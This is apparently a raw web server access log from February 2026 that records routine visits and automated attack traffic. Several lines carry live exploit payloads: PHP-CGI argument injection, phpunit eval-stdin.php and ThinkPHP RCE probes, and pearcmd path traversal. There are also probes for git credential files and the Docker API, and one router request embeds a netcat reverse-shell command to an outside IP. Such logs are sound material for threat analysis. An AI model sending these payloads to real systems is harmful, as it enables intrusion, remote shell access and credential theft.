OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Feb/2026:13:28:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:13:38:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:13:53:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:13:59:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:14:02:15 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:14:18:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:14:34:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:14:37:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.178.110.241] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[18/Feb/2026:14:46:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:14:59:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.232.121.71] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:14:59:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.232.121.71] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:14:59:31 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:32 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.232.121.71] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:32 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:33 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:34 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:34 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:36 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:36 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:37 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:38 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:39 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:39 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:39 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:40 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:41 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:41 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:41 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:42 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:42 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:42 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:43 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:43 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:43 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:44 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:44 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:44 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:45 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:14:59:46 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:15:06:35 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+144.172.73.168+9898+%3E%2Ftmp%2Ff)" [Client 45.148.10.246] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[18/Feb/2026:15:11:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:15:26:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 144.79.133.252] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:15:26:05 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 144.79.133.252] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:15:26:06 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 144.79.133.252] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:15:27:07 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 144.79.133.252] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:15:35:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:15:35:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:16:02:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:16:08:11 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:16:10:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:16:14:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 152.136.153.69] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[18/Feb/2026:16:26:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:16:29:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:16:29:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:16:29:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.134.216.108] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Feb/2026:16:29:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:16:31:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:16:32:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.216.108] [Length 0] [Gzip -] "-" "-" +[18/Feb/2026:16:50:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:16:56:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 34.79.92.159] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[18/Feb/2026:17:02:07 +0000] 404 - GET http 222.117.41.51 "/dispatch.asp" [Client 195.3.221.86] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:17:10:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 43.159.141.115] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:17:10:21 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 43.159.141.115] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:17:10:21 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:22 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 43.159.141.115] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:22 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:23 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:24 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:25 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:26 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:27 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:28 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:29 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:30 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:31 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:31 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:31 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:31 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:10:31 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 43.159.141.115] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:17:15:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:17:17:25 +0000] 404 - GET http 222.117.41.51 "/.git/credentials" [Client 195.178.110.246] [Length 122] [Gzip 1.35] "Screaming Frog SEO Spider/8.1" "-" +[18/Feb/2026:17:29:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:17:35:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:17:41:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:17:55:39 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 85.11.167.7] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.8" "-" +[18/Feb/2026:18:08:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:18:16:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:18:23:20 +0000] 200 - GET http 